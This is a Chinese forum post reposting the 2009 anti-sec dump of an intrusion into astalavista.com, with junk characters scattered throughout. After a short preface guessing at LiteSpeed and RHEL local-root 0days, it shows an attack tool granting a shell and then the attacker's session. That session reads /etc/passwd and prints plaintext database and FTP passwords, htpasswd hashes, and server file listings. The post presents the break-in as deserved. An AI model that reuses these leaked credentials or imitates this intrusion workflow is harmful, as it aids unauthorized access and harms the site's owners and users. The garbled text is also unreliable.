里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
0 r% _5 i5 z! ~2 P2 c* {3 E' I' W# M6 M7 P1 l! O9 W! u
[root@front3 ~]# curl -I litespeedtech.com, z3 I( v* e# }2 s" [
HTTP/1.1 200 OK( t. `) Z8 F7 w3 e, m. q I
Date: Fri, 05 Jun 2009 22:54:51 GMT
- |) U& R4 l2 c9 C* ]. PServer: LiteSpeed$ v! g/ w+ s6 R
, M$ U) B" s2 B, @另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-
( A. J# {: s$ H4 i
" V2 ?! N: i% G7 u0 _! t有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。; p$ e$ b9 g9 ]! X1 {. Y
8 h0 ?4 ?/ v# H$ ?2 K0 W6 F
+ n; d6 n3 f9 Y) ?: P. J
/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
' Y8 |6 [7 w+ V/ E# {/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \
( n( c2 g% {. \) a/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \; l: P- T) a6 S& `
\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /7 ]8 c8 t5 |+ r4 J7 p& t
\/ \/ \/ \/ \/ \/ \/' a4 i% `: ]0 f' @( _
The Hacking & Security Community
5 S0 ?" p" f+ h7 S/ P[+] Founded in 1997 by a hacker computer enthusiast# r* J3 A" r: e0 f& ?
[-] Exposed in 2009 by anti-sec group
K3 S4 F P# X3 t) @" o8 [0 n+ u2 L6 }0 E9 _$ J6 x
From < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:" w; F! H" C5 D
>> 03. Who’s behind the site?
: F9 q, a. J) g2 U, g" S>>9 Q; d$ |' ?, D+ A
>> A team of security and IT professionals, and a countless number of contributors from all over the world.6 w$ |$ H& d' q' ~% }
* D6 i, @3 I$ O8 ?( M* X; D
>> 05. Is it true that the site is visited by script-kiddies and warez fans only?
4 j, w6 P# m0 G! Y" l9 }# o>>
9 l7 u+ T, N9 Z* t. }>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and
2 ^; h Z3 \1 Q0 Z! Wmilitary institutions.
0 D n3 r2 M$ Y0 \- O/ F8 J* k# W>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
" n- V9 p$ I4 R( t1 ~: y6 z' M8 Z0 q2 k
Why has Astalavista been targeted?
; L( E J% z v( ^7 V( M Z) c
4 [3 A; Y( m# l8 q, hOther than the fact that they are not doing any of this for the “community” but
! I; ]# G" o: jfor the money, they spread exploits for kids, claim to be a security community5 q G4 y! d# Y* `, _8 O( c
(with no real sense of security on their own servers), and they charge you $6.66
% n0 m- D0 l% E. q9 s7 R- nper months to access a dead forum with a directory filled with public releases0 D3 J& o4 X, m4 W- C( P
and outdated / broken services.
9 l3 T7 K! C: Y0 O- J0 m; N
: ?, ~7 p% G2 P* H+ dWe wanted to see how good that “team of security and IT professionals” really is.
3 x& p6 N4 e5 a9 Z& n
5 h6 f9 N1 z/ o. t5 YLet’s begin.
4 q. z! @0 R* t. v7 u- \; L8 c/ e6 Z; l) o$ d
anti-sec:~# ./g0tshell astalavista.com -p 80
~! n; W+ Z% X' j" I[+] Connecting to astalavista.com:80& o+ _1 K; R* r6 y
[+] Grabbing banner…6 g3 G/ {4 p( ^9 t! \; U) W% }4 Y
LiteSpeed
6 t6 a! M- p5 p[+] Injecting shellcode…$ g' U* ^4 V* B1 k1 l% m, S% y
[-] Wait for it
+ z/ l5 l7 F! {4 r
c- @8 C* Y+ x( r' h2 f' h[~] We g0tshell/ G% o9 u7 O2 ^! ^; I6 \& [
uname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux* b* X9 l+ ~: P, E' C
ID: uid=100(apache) gid=500(apache) groups=500(apache)! I% J) R! W6 p n5 Z: P$ k$ w8 i/ r
; K0 n0 Y! ^; ]" k1 Q* S* Zsh-3.2$ cat /etc/passwd: X1 w- p" o8 Q3 a% w9 D4 @
root:x:0:0:root:/root:/bin/bash
( N* x* l* f" Y A2 [5 Vbin:x:1:1:bin:/bin:/sbin/nologin8 C" I% L9 y' @: D
daemon:x:2:2:daemon:/sbin:/sbin/nologin
, W b' {: s- c& P3 Aadm:x:3:4:adm:/var/adm:/sbin/nologin
9 }& z f3 c1 o( nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin( j( A! H O: R' E+ Z5 F; @; }; J! a
sync:x:5:0:sync:/sbin:/bin/sync, \3 C0 p; @- n' G: p" t3 X& K/ Y
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown0 _( c4 L% V! I6 e* d
halt:x:7:0:halt:/sbin:/sbin/halt
" l1 {% ]9 {8 Pmail:x:8:12:mail:/var/spool/mail:/sbin/nologin
; A9 S5 v! x5 enews:x:9:13:news:/etc/news:
4 {2 q! J4 q6 d/ E" cuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
2 R& z/ d% k- x; U' D- C+ Toperator:x:11:0perator:/root:/sbin/nologin
0 ]; s) L2 \: \; kgames:x:12:100:games:/usr/games:/sbin/nologin
5 i& N* Y! u) ]# _gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
! d/ n: V7 q: W" Y( Dftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
2 G r9 T3 }/ G7 n2 o; h, gnobody:x:99:99:Nobody:/:/sbin/nologin
* R# \. |* M; C% P5 ~. H/ q1 qrpm:x:37:37::/var/lib/rpm:/sbin/nologin I& Q7 p# |, y8 Z0 @
dbus:x:81:81:System message bus:/:/sbin/nologin
7 s# T& S' b/ Q$ Y8 Onscd:x:28:28:NSCD Daemon:/:/sbin/nologin
) @* Y' s% [( m/ A Hmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
1 c. W' h9 o; bsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
) s: X8 N, H0 R: H1 I& ?vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin9 l) T) n' c2 s& ~0 V" g
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
: Z" v- z& X! l/ C1 L8 i7 nrpc:x:32:32ortmapper RPC user:/:/sbin/nologin
) R7 J4 {3 v$ s R/ d; b8 |* Mrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin* F" O6 @2 F: f* ~ M" n. i
nfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin( H3 ?* l. ~+ l3 h8 a5 q" v
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
$ e6 ~/ k5 J8 tpcap:x:77:77::/var/arpwatch:/sbin/nologin
, {/ m, K. O: C9 B- I4 @. Vnamed:x:25:25:Named:/var/named:/sbin/nologin9 {0 t' p! B8 F/ J d5 B
apache:x:100:500::/var/www:/bin/false
8 W0 W* Y* c7 I. R6 b" e$ cdiradmin:x:101:101::/usr/local/directadmin:/bin/bash
1 L2 K2 ^0 S/ v3 T2 {& ^mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash6 n, T4 H5 v! d( T8 M
webapps:x:500:501::/var/www/html:/bin/bash* i! k% H; i! D3 ]2 G2 Z3 S
majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
+ l& j0 R1 B5 R- o3 D3 yadmin:x:501:502::/home/admin:/bin/bash
3 }, ~% K+ o5 E) g6 B3 vjon:x:502:503::/home/jon:/bin/bash J! L3 h& j0 E
com:x:503:504::/home/com:/bin/bash
3 i; W a k) W' X. entp:x:38:38::/etc/ntp:/sbin/nologin0 s, K+ Q3 \: d+ P: W( u
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin0 G: m2 i' t4 N: W, T% R( |
astanet:x:504:505::/home/astanet:/bin/bash
% v$ |3 y" g& I) r: `avahi:x:70:70:Avahi daemon:/:/sbin/nologin
: b0 V. C7 o0 \2 {avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
* a/ {; E- z' e+ Y7 F$ G, l3 V5 j: C7 j& O+ j1 I, k/ [
sh-3.2$ cat /etc/hosts
6 N0 q, N- R! ?5 @; I# Do not remove the following line, or various programs
) i, }8 W* x) W: r @) b# that require network functionality will fail.( V4 G7 h% E: |& S$ t2 F' G
127.0.0.1 localhost.localdomain localhost
# s* \% J& J" K$ P+ j$ b" P: r::1 localhost6.localdomain6 localhost65 W# L, f) \9 A( v- T" R# ~
80.74.154.172 asta1.astalavistaserver.com
8 R5 M; T/ X& n$ o$ P! L+ l _: ]6 y+ Y$ Z) k: q
sh-3.2$ pwd5 { e' \2 e3 o- }
/home/com/public_html; K" e3 F- O/ M
$ h0 i! F' K" ^' ?& _) t/ L }
sh-3.2$ ls -la" h, l$ C2 T# A% y: U
total 18460
" U2 r6 |. n I4 mdrwxr-xr-x 30 com apache 4096 May 28 17:06 .0 q6 B1 d0 h; O! s' @) z4 }1 ]8 L
drwx–x–x 11 com com 4096 Jun 25 2008 .." S( c1 ~1 l4 S4 F7 N4 ^
drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin
- X) \! u* T- K. w! m/ Xdrwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache
6 o$ O5 q& N6 ^drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
' v( O+ {! w0 O: hdrwxrwxrwx 2 com com 4096 May 19 00:50 config# S9 e1 Z2 r! t
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core
+ I7 c! B& @' T# R `& Adrwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules* m6 k+ v `& _6 N! F! S0 p# P
drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing# U+ T4 ?% M& v( q! k, f
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo
) L# _- b6 Z# g* w- ldrwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__ L5 \' K, [, s/ P) a0 U
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php X2 i! v+ L- N5 ?) W' h& Q/ `
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd2 R% j/ `3 |7 {% [$ Q, f& _" c3 D
drwxr-xr-x 3 com com 4096 Feb 2 19:29 editor, z: ~/ T5 D- w& y
-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico: r% J" i) m9 N2 M
drwxrwxrwx 2 com com 4096 Jun 4 08:00 feed+ h: h- p2 m, Q8 x
-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess7 y: Q4 t a; W# H
-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak6 z/ }/ L: N% E- ?- _
-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak# u6 U+ O* M3 {( }, E- v" d+ J# b
drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool
; f2 |% ^) R5 m8 h, Fdrwxrwxrwx 14 com com 4096 Feb 2 19:29 images+ e4 j9 |0 \1 I9 S& c
-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
3 M0 I1 ?6 G8 P% Fdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer
7 C4 D3 |2 h! ^, bdrwxr-xr-x 8 com com 4096 Feb 2 19:29 lang* y3 B; z2 D2 k/ Y6 H, P
drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib. H: @# O, Y# T% j
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media8 w, Q4 O w: G, }# c$ L, C6 p
drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
5 L M+ `* }* m4 ~* qdrwxr-xr-x 34 com com 4096 May 28 16:30 modules& o6 j3 {' Q9 _8 V: q2 p" e& M
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin
! j& Q, Y8 b2 c% P* Z6 \9 hdrwxrwxr-x 22 com com 4096 May 28 17:06 _new/ |* X- x r5 s7 ^3 E3 t
drwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
9 i6 o/ H, a2 ^6 h. `drwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy& q8 ^- f! _- c0 }- s; C1 T l
drwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy4 `& }- t- j, W+ Y% x5 T
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt/ | K- x" b/ Z5 w k& f D4 U
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml( P- O& H% r) ?$ R
-rw-r–r– 1 com com 223 Mar 30 15:32 test.php) U% a& v1 A f) {& p
drwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
: e/ p6 o' N( pdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp7 S( l1 g- F) ^7 U
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam
4 t/ v( s W, ~2 }( u# b1 t5 N& d1 C& g+ n' S) f* z
sh-3.2$ head -20 index.php8 T3 Y- f n5 P) G/ \3 q
<?php! q- f, a; w' S$ h D8 Q
@$ _$ f" R |9 |) f4 F; S
/**1 T4 j* I6 M( {/ A8 i1 j5 k
* The main page for the CMS
% F; x/ |4 V4 g* J* @copyright CONTREXX CMS - COMVATION AG
/ f1 G3 G6 Q% S! s* @author Comvation Development Team
7 H" @6 b3 j5 ^# X0 e. s- f* X* @version v1.0.9.10.1 stable
. V+ D A8 p- ]7 ^/ p* @package contrexx5 g/ v% S4 w! t
* @subpackage core
0 {8 x8 J# x4 i5 T0 X3 J9 o* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage4 y( v/ L6 Y/ K% I8 Q9 Y
* @since v0.0.0.0
6 b. v3 y" U6 i3 R: f7 e7 M3 J* @todo Capitalize all class names in project
' m0 l. \& o. |6 d# g* @uses /config/configuration.php& x& [ B! o' _2 t( N5 z5 t0 D8 F
* @uses /config/settings.php% @) ~2 F$ X9 X- O/ _; T
* @uses /config/version.php+ y5 L1 W& _! C4 ^ j, p* z
* @uses /core/API.php M1 ?) J. Q1 o9 \1 k" @5 [& m
* @uses /core_modules/cache/index.class.php
# }, b; d: W# ]* @uses /core/error.class.php* u9 m g+ l" X- ^ j8 B( w
* @uses /core_modules/banner/index.class.php
2 a& |; H2 r' G. d. e* @uses /core_modules/contact/index.class.php6 }' N, ^& C1 i
! e9 s% b4 X. K1 z2 U# ]
sh-3.2$ cd config/
! w1 H' Y, v0 j" T* Lsh-3.2$ ls -la3 }9 |! X' P- G
total 32 ]' o7 X$ r/ }1 p
drwxrwxrwx 2 com com 4096 May 19 00:50 .
: ?5 k3 X* L Vdrwxr-xr-x 30 com apache 4096 May 28 17:06 .., y. z$ b, A0 l4 t" a$ q- D+ g( I
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php( u& c7 S' ?* i: l3 D7 [& u1 ~
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php! J/ j. R- N, B }0 B9 x; F
-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php: S1 Y- q8 K' i- _5 S% m
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
9 A3 T* j0 h& s ?9 x9 p
' b. Q$ l8 O! Msh-3.2$ cat configuration.php# b9 X% ~2 ~' J& V/ a
[snip]
3 @" f4 _+ {5 O7 I7 J+ w8 ?1 t$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost6 x& d h; P9 q) d" M7 x
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name
7 a8 k1 }( e7 I: a: {$ y3 `- G$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix
7 v4 v. k( N0 t0 \7 T$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
^* _2 z- k, w6 v, C4 Y$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password
; ]! K& h0 l! `3 _$ J$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)
6 N# w$ ^5 `: S" W, z# ~$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
, K6 X$ Z, v$ T$ W' ^1 v& U[snip]9 h& |- A# ^. e/ E: n7 T
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false7 n0 E9 T5 `; m7 k5 v
$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
3 n- T: ?" `& s" j$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
, x) R4 j7 m# x% k9 @- S) @" U) k2 P$_FTPCONFIG['port'] = 21; // Ftp remote port
8 [2 W4 H6 Q8 O$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username: R* D. F4 N3 |- v3 z0 y6 I. g
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password8 x% V0 L: j: x( c+ H! b7 O( ?
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms) O3 N5 k2 @! E2 S1 R0 n% Q
3 J2 u+ }9 z; c( b* R0 D6 y/ H; Z
sh-3.2$ cd ..$ y4 N" M o( w
sh-3.2$ cd dvd/4 t0 f2 B! A' {, G6 Q' V, \
sh-3.2$ ls -la$ \4 }0 ^/ K# Z+ t
total 2913780
0 P+ v- P6 @, D$ O# v; b+ N4 [drwxr-xr-x 2 com com 4096 Sep 9 2008 .; I: K0 W' J9 p- Q
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
) Q$ ^5 W# n( z5 i3 d) t-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar5 t6 c% `2 ^9 l
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar1 _5 d* A$ i# H- G" u: @$ a
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar$ _8 k3 I4 L9 Z5 {
-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess
% L7 ~* j4 I% ]& I6 s# F
- h9 ~" J1 V* x) g3 V7 I4 N) T# u% B3 Msh-3.2$ cat .htaccess+ m! r# [( k/ a) }
authType Basic
* k9 P) G0 u* R, i' Y/ u8 ], }authName DVD
. J. @! h: _ i5 s' gauthUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
6 J; ?. @* d y+ `! Yrequire valid-user
) P# J0 p% x3 D: e3 b0 r
+ v" f/ T# N: I( C/ \sh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd& N( A4 w) k0 h9 H( w; B' l3 A
DVDdownload:CRD8cuY6.MPT60 z$ x% [0 q5 l+ v6 X
DVDdownload2:CR8a36.wluFMg
3 {" {9 Z4 c5 R
& s3 g+ T9 L, v* w. C @* \" W& `sh-3.2$ cat test.php
+ k) h; [0 D5 d6 i9 @<?php" g/ k8 l2 Q6 Y# p2 x1 K7 N
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
; u b1 V5 `, u! S! N+ d& _1 R$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));; k" O4 K. U- p, |" b6 V, Z6 y4 \
echo $url;, M( m& t( ^) D: e4 b9 s6 s u2 U4 t
?>8 T( y6 z2 z. @/ I+ j
( y) ~: B% v9 l$ ^; r2 w
sh-3.2$ cd modifications/
% R5 g# W4 H& @) ^6 m" ~, Q& \6 [sh-3.2$ ls -la
( a7 y: |3 ]' i7 b- ~$ Z! Wtotal 329 N; {1 _+ d5 R/ H3 [8 K* g
drwxr-xr-x 8 com com 4096 May 11 12:48 .
& k7 J) q% Z* ], S* cdrwxr-xr-x 30 com apache 4096 May 28 17:06 ..
$ H2 e7 r# a) w, _' N- |! Qdrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
6 C5 G' ]$ F& {. j+ c+ B0 odrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
& D. [5 }# F% c" k" Fdrwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools
- E! J' t* c/ |" V0 Z5 Xdrwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
w+ y9 t6 l, @) T1 e( }& Wdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search, X0 K5 r$ _0 M( Q
drwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
4 [" h* H Y4 a1 o1 p6 P! g R: b6 Q0 ^* I6 E7 M5 `$ `
sh-3.2$ ls -R2 O& }+ |9 F: w1 v5 a% f
.:. P* A7 @5 K- K
com_avtng cronjobs onlinetools pjirc search _tmp q& k7 C% s! L2 o. N, W9 T8 x
, Z# U( o' Z9 D" n: A6 t. k
./com_avtng:7 h! d- J9 r- v' |' |* d
avtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts2 c3 F* ^5 v9 B. N' v- U
. }2 {* W F' z1 u7 F6 M' V Q3 B
./com_avtng/scripts:, M7 [ H% D# E ?: N' [. d( W' f
popunder.js
3 N! I i) K @2 j0 I6 d0 V& S. j* m' V( z( m
./cronjobs:
/ b6 \' ^3 s* u- Qexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
& m- `, f O8 H5 {, [3 |
$ K' K7 x* r3 v7 k- V# E& k./cronjobs/tmp:( Y8 @: G) ~. `0 [3 S
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
4 [6 I/ \7 C& Y% k$ @) `
5 d, D: ?0 ^1 X1 I./onlinetools:
' P: u, O0 r5 oindex.php
7 B( U2 \# N: Y4 t Q3 P0 X' \' b! O' t# e& p, N- E0 F; B
./pjirc:
2 _2 ]$ I2 R5 S$ I( T% u& S4 |" ua_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
2 G, J3 k1 `- qAppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt
2 E) r* c' V! k: D cbackground.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
( H7 x. [6 h2 z$ D1 V3 Z5 n; E/ e( `/ R& D
./pjirc/img:3 k9 ]8 l; C5 t, M( B/ X
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif# B- ?4 [: I, o6 I) z
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif " ^& {# G$ q2 X) r
verre-eau.gif
2 b$ M/ S* f# B3 Xargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif 9 k( }& \4 l5 H/ s6 T0 S; w
verre-vin.gif/ ]. f- G! }( g. `% G' [
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif/ S! ^ I: [& ]
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif! g; X0 C" z! j
: q6 T2 o5 [- O' ], \8 F: @./pjirc/snd:
" F4 ?: y2 N- V7 ] Gbell2.au ding.au
/ X, \; N- X, z3 d0 t$ s* C/ j* ?& V. H. J9 [( G; T8 Y0 @) z- h; S* l. w
./search:
/ W2 U6 |+ n" O ^1 g4 {searchEngines.php search.php, R3 p9 H1 ^* {2 J5 Y- u8 W8 \
0 ^$ f* l, Q! K9 X5 k+ d5 _
./_tmp:4 u+ d0 ^" U; T$ ?- i5 j! L
defaultPorts.php defaultPorts.txt
( |/ A4 j; e9 j) K' v$ i0 w
" m0 x- k* O9 o+ Q* \* U* m/ Rsh-3.2$ cd cronjobs/- i6 ]5 J7 n" S" }# X
sh-3.2$ cat exploits.php
: Y' p, t! b, H" x[snip]
* Q! i3 n# ~1 }; L# b$categories = array();
# H& |# G, ^% S3 [; }2 a$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;/ O; w/ \; K" q* M
$expolits = file($milw0rmFile);$ r( d) @+ L# I' h4 d
$comExploits = array();
# N7 u7 B: \2 t! N7 C5 u9 D" y q[snip]
5 a. b c; G7 c// manage data# a; W+ t k$ M1 }8 g+ e
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 2640! L- [) K+ E- W, }( R# h* H
5 D2 L* l, }' s5 `& p! d // get path and title3 {1 L& I! d1 p4 ?' {3 S$ c9 t
$expolits[$x] = trim($expolits[$x]);* g0 ^1 l( |) K8 s7 m
$path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
6 T7 w2 w' V8 k8 Q4 b! e $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);& l9 Z4 A5 B, {
/ S9 M1 z4 r- C, m9 Y% l, G // check if file exists
8 A# G$ t. U4 d+ e5 q if (file_exists($path)) {
7 Z9 u9 o, B) [0 C% H7 u' v1 z. O
$text = file_get_contents($path);/ ~) N/ a& V# h/ c% _2 k
, a9 y L7 L. M% M3 @0 f // get content and date
. n! N% ?. J D, t //$text = htmlspecialchars($text, ENT_QUOTES);! F8 l" m% O' s0 r
$tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));2 y4 {, T7 b. _ _# T$ } v
if ($tmptext != ”) {! e/ ?0 o4 }: w6 ^! V$ \0 W( G! K
$text = $tmptext;1 B! G) z4 A8 o9 N" @2 W
} else {
' {* Y" J2 M& H $text = addslashes(htmlentities($text, ENT_QUOTES));4 `) E0 N- U+ E/ X0 S$ J" C/ w
}' G! N4 o+ L- b" m
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));, m+ i+ j0 O8 F3 `
$tmp = explode('-', $date);5 e2 v( n' g) ?0 @: d! `
$date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
6 t" Z4 i3 K S# u $cat = getCategory ($path);
& F1 Q+ p; F" v4 r$ X $ext = pathinfo(basename($path));
$ e" e: ~& k0 Z) `0 G $ext = $ext['extension'];
! b5 E+ O0 J' S& W) |. n, n $qStr = ”
! e8 G+ X' q) z SELECT `id`
2 H! Q$ G: O) ~: [3 a( t: ]% X FROM `contrexx_module_exploits`. t, Z! @, s0 I& m# j0 \
WHERE `title` = ‘” . $title . “‘
- r' P1 N( b' L AND `date` = ‘” . $date . “‘
# R% D& [; o- q: F$ e" D “;6 ]& |' K# _* v9 w/ U
echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
4 J2 W n v. w3 f$ ?) I7 R $q = $_objDB->query($qStr);
0 e, _4 k2 E( @. X& ?$ n
. D% @1 L7 J; P `8 [ A" [0 J if ($q->numRows() == 0) {% R" L5 G- u# P' d
! t' Q4 ^% H9 b1 x // prepare array# ?, r* N9 q3 N
$comExploits[$x]['date'] = $date;
& ?5 {" ~% f: s1 G& G) _4 f. g $comExploits[$x]['title'] = $title;
. r: I' c3 J T" w! @: u' F3 t% ] $comExploits[$x]['author'] = ‘milw0rm’;
2 u; @& s9 J: b& O $comExploits[$x]['text'] = $text;8 d1 k' H* _( g
$comExploits[$x]['source'] = $ext;& ?4 }7 c' v3 b D
$comExploits[$x]['url1'] = ”;
0 O8 v) E# P% g: {8 w $comExploits[$x]['url2'] = ”;
5 L: n+ b/ U! v; P o+ Z" Y! G $comExploits[$x]['catid'] = $cat;; }' `9 S# O- {$ Z
$comExploits[$x]['lang'] = ‘2′;
! {7 D6 h, O' f% d- G9 P8 S $comExploits[$x]['userid'] = ‘12′;7 {( R. r) f6 k9 d: ?4 G5 t( g
$comExploits[$x]['startdate'] = ‘0000-00-00′;
2 W s7 r0 Y( k: L, x $comExploits[$x]['enddate'] = ‘0000-00-00′;
. f- T/ f2 H5 v0 V $comExploits[$x]['status'] = ‘1′;
9 O$ z# v$ n( `9 ~ $comExploits[$x]['changelog'] = $date;. l& @4 v8 t1 @3 Y' ?* L4 O
- y( b& R# {1 b% z2 F3 c5 w4 e( G
}* g* H2 r5 Y# N: B
[snip]9 P7 Y N, K% s
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
' c4 e- |7 e% H' ^<rss version=”2.0″>
% f1 o( q9 p3 h8 u A <channel>
/ D2 m y" X' m) e <title>ASTALAVISTA.com - Exploits</title>
* ?! _2 f7 T# z/ j _. N <link>http://www.astalavista.com/exploits</link>
5 ^6 j+ a( U ~8 V5 S <description>All availably Exploits.</description>
" A3 B; ~6 z6 G7 S <language>en-us</language>( W; r. t9 y; m2 [6 ~7 `
